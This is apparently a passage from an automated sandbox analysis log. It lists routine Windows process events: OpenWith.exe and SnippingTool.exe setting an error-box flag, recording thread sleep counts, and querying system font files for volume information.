Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SnippingTool.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe TID: 5856Thread sleep count: 91 > 30
Source: C:\Windows\System32\OpenWith.exe TID: 8056Thread sleep count: 131 > 30
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userbrii.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userbrib.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userbriz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userFR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userFI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userFB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userST.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userSTI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userSTB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\userSTBI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
